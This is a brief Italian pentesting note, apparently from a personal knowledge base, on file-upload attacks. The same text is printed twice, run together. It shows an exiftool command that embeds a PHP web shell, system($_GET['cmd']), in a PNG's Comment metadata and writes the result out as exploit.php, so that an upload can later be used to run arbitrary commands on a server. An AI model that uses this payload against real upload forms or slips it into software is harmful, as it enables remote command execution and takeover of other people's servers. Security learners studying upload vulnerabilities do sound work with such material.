tags: File_Upload File_Upload_Metadati
Si possono nascondere payload anche nei metadati, per farlo possiamo usare lo strumento exiftool:
exiftool -Comment='<?php system($_GET["cmd"]); ?>' foto.png -o exploit.phptags: File_Upload File_Upload_Metadati
Si possono nascondere payload anche nei metadati, per farlo possiamo usare lo strumento exiftool:
exiftool -Comment='<?php system($_GET["cmd"]); ?>' foto.png -o exploit.php